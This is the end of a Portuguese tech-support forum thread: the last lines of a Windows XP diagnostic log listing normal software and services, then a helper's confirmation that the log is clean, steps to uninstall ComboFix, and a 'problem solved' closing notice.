O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARQUIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1235056171250

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O17 - HKLM\System\CS1\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: Intel® Active Management Technology System Status Service (atchksrv) - Intel Corporation - C:\Arquivos de programas\Intel\AMT\atchksrv.exe

O23 - Service: avast! Antivirus - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

O23 - Service: avast! Web Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Arquivos de programas\Java\jre6\bin\jqs.exe

O23 - Service: Intel® Active Management Technology Local Management Service (LMS) - Intel - C:\Arquivos de programas\Intel\AMT\LMS.exe

O23 - Service: PostgreSQL Database Server 8.3 (pgsql-8.3) - PostgreSQL Global Development Group - C:\Arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe

O23 - Service: Intel® Active Management Technology User Notification Service (UNS) - Intel - C:\Arquivos de programas\Intel\AMT\UNS.exe

 

--

End of file - 6809 bytes

[wings 22]

O log está limpo.

 

 

*Clique em [iniciar] > [Executar] > digite: combofix /uninstall

*Clique [OK]

 

 

*Clique em [Executar]

*Surgirá a mensagem: "ComboFix está desinstalado"

 

*Clique [OK]

*Delete o arquivo C:\combofix.txt

[wings 22]

PROBLEMA RESOLVIDO!

 

Caso o autor necessite que o tópico seja reaberto basta enviar uma Mensagem Privada para um Moderador com um link para o tópico.